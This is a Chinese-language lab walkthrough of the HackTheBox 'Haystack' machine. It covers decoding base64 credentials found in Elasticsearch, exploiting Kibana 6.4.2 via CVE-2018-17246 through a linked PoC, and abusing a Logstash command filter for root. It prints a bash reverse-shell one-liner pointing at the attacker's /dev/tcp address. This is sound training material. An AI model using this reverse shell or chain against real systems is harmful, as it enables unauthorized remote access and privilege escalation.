HackTheBox-Linux-Haystack

admin 2022年3月28日01:01:26评论53 views字数 1945阅读6分29秒阅读模式

一个每日分享渗透小技巧的公众号HackTheBox-Linux-Haystack



大家好,这里是 大余安全 的第 162 篇文章,本公众号会每日分享攻防渗透技术给大家。

靶机地址:https://www.hackthebox.eu/home/machines/profile/195

靶机难度:初级(3.6/10)

靶机发布日期:2019年10月20日

靶机描述:

Haystack is an Easy difficulty Linux box running the ELK stack ( Elasticsearch, Logstash and Kibana). The elasticsearch DB is found to contain many entries, among which are base64 encoded credentials, which can be used for SSH. The kibana server running on localhost is found vulnerable to file inclusion, leading to code execution. The kibana user has access to the Logstash configuration which is set to execute files as root based on a certain filter.


请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

HackTheBox-Linux-Haystack




HackTheBox-Linux-Haystack

一、信息收集


HackTheBox-Linux-Haystack

可以看到靶机的IP是10.10.10.115...

HackTheBox-Linux-Haystack

我这里利用Masscan快速的扫描出了21,22,9200端口,在利用nmap详细的扫描了三个端口信息,9200是http服务等...

HackTheBox-Linux-Haystack

web页面只有一张图,下载该图查看下....

HackTheBox-Linux-Haystack

成功下载...strings解析...

HackTheBox-Linux-Haystack

发现一串base64值,转存发现了一段话...

HackTheBox-Linux-Haystack

这是西班牙语,通过靶机介绍的,翻译了这是key的意思,记住下clave这个词...

继续检查9200...

HackTheBox-Linux-Haystack

可以看到该页面是Elasticsearch,其中的数据以“索引”的形式存储着...它类似于任何关系DBMS服务器中的数据库,要列出数据库中存在的所有索引,google给了很多提示..._search等...

HackTheBox-Linux-Haystack

通过_search?q=clave发现了用户名密码的basr64值...

HackTheBox-Linux-Haystack

转储发现了是security用户信息...

HackTheBox-Linux-Haystack

成功通过SSH登录该用户....

并获得了user_flag信息...

HackTheBox-Linux-Haystack

本靶机存在Logstash,这是一个开放源代码的服务器端数据处理管道,它同时从多个源中提取数据,进行转换存储...

这里没有权限打开...

我进行了端口查看,5601是开放的本地端口...

HackTheBox-Linux-Haystack

映射端口到kali本地...

HackTheBox-Linux-Haystack

这是kibana框架服务页面...

HackTheBox-Linux-Haystack

知道了是某框架,就查找版本,该版本6.4.2

HackTheBox-Linux-Haystack

直接找框架版本漏洞...存在CVE-2018-17246

HackTheBox-Linux-Haystack

HackTheBox-Linux-Haystack

https://github.com/mpgn/CVE-2018-17246

通过介绍,参考POC即可...

HackTheBox-Linux-Haystack

直接本地写入shell,上传后通过POC提示,执行后获得了反向外壳kibana权限....

HackTheBox-Linux-Haystack

前面就知道Logstash是一种从各种来源收集数据并将其发送到Elasticsearch进行存储的软件,它可以从各种日志和服务(例如数据库,系统日志等)收集数据....

前面没办法查看,现在查看下其中配置信息...

HackTheBox-Linux-Haystack

意思很简单,输入的shellcode只需要放置在Ejecutar comando :  之后即可...

执行硬条件必须在/opt/kibana/logstash_*下,那么创建个logstash_dayu等类似文件,写入shell即可...

HackTheBox-Linux-Haystack

Ejecutar comando : bash -i >& /dev/tcp/10.10.14.51/4444 0>&1


成功获得了root权限,并获得了root_flag信息...


这里学习到了CVE-2018-17246漏洞的复现,以及Kidnan框架的一些问题...

由于我们已经成功得到root权限查看user和root.txt,因此完成这台初级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。


如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

HackTheBox-Linux-Haystack


如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~

HackTheBox-Linux-Haystack
HackTheBox-Linux-Haystack


HackTheBox-Linux-Haystack


随缘收徒中~~随缘收徒中~~随缘收徒中~~


欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!

HackTheBox-Linux-Haystack

大余安全

一个全栈渗透小技巧的公众号

HackTheBox-Linux-Haystack



本文始发于微信公众号(大余安全):HackTheBox-Linux-Haystack

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月28日01:01:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HackTheBox-Linux-Haystackhttps://cn-sec.com/archives/548253.html

发表评论

匿名网友 填写信息